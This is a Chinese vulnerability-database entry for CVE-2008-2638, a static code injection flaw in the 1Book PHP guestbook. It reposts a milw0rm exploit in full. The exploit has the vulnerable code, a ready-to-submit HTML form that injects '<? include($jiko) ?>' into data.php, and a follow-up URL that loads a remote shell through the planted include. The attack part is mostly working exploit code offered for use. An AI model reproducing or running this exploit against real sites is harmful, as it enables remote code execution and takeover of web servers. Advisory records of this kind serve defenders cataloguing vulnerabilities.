1Book guestbook.php 静态代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115340 漏洞类型 代码注入
发布时间 2008-06-03 更新时间 2008-06-09
CVE编号 CVE-2008-2638 CNNVD-ID CNNVD-200806-139
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/5736
https://www.securityfocus.com/bid/84936
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-139
|漏洞详情
1Book1.0.1以及之前的版本中的guestbook.php存在静态代码注入漏洞。远程攻击者可以借助一个会写入data.php的HTMLwebform中的消息参数,上传任意的PHP代码。
|漏洞EXP
=========================================================
=============== JIKI TEAM [ Maroc And YameN ]===============
=========================================================
# Author  : jiko
# email  : jalikom@hotmail.fr
# Home   : www.no-back.org & no-exploit.com
# Script  : 1Book Guestbook Script
# Bug   : remote code execution
# Download  : http://1scripts.net/scripts/1book.zip
=========================JIkI Team===================

 # if(in_array($_POST['username'], $bannedusers))
 # echo 'Your username has been banned by the administrator.<br/><br/>';
 # if(in_array($_SERVER['REMOTE_ADDR'], $bannedips))
 # echo 'Your IP has been banned by the administrator.<br/><br/>';
 # elseif($_POST['1'] + $_POST['2'] != $_POST['check'])
 # echo('You answered the security question incorrectly.');
 # else
 # {
 # $data = unserialize(file_get_contents('data.php'));
 # array_push($data, array('user' => $_POST['username'], 'date' =>
 mktime(), 'message' => $_POST['message'], 'website' =>
 $_POST['website'], 'ip' => $_SERVER['REMOTE_ADDR']));
 # file_put_contents('data.php', serialize($data));
 # }
 #
 #}

 #===========================================================================================================================#
 # So, we can write a malicious code like <?php include($jiko); ?> in
 the variable $message, and $username #
 # and then we go in
            http://Site/script/data/data.php?jiko=[shell]
 #
 #===========================================================================================================================#
 simple exploit whith HTML:
 -------------------------
 change site by your site
 +++++++++++++++++++++++++

 <title> EXploit BY JIKO</title>
 <center>
 <form method="post" action="site/guestbook.php">
 <input type=hidden name=username value="jiko was here" >
 <input type=hidden name=message value="<? include($jiko) ?>" >
 <input type=submit value="send">
 </form>
 <h5>a fter send your usage:
 <br>http://site/scripts/data.php?jiko=[shell]</h5>

 
=========================================================
 greetz:
 all my friend [kil1er & GhosT HaCkEr & stack ] and H-T Team and all No-back members and tryag.Com
 visit: www.no-back.org & www.tryag.com & no-exploit.com
=========================================================
**************************
 hello brother i want chnage my name Jiki Team to JiKo and my email to
 jalikom@hotmail.fr  and this a news bug
 remote code execution

# milw0rm.com [2008-06-03]
|受影响的产品
1-Script 1-Book 1.0.1
|参考资料

来源:XF
名称:1book-guestbook-code-execution(42854)
链接:http://xforce.iss.net/xforce/xfdb/42854
来源:MILW0RM
名称:5736
链接:http://www.milw0rm.com/exploits/5736
来源:VUPEN
名称:ADV-2008-1735
链接:http://www.frsirt.com/english/advisories/2008/1735/references
来源:SECUNIA
名称:30146
链接:http://secunia.com/advisories/30146
来源:1scripts.net
链接:http://1scripts.net/php-scripts/index.php?p=16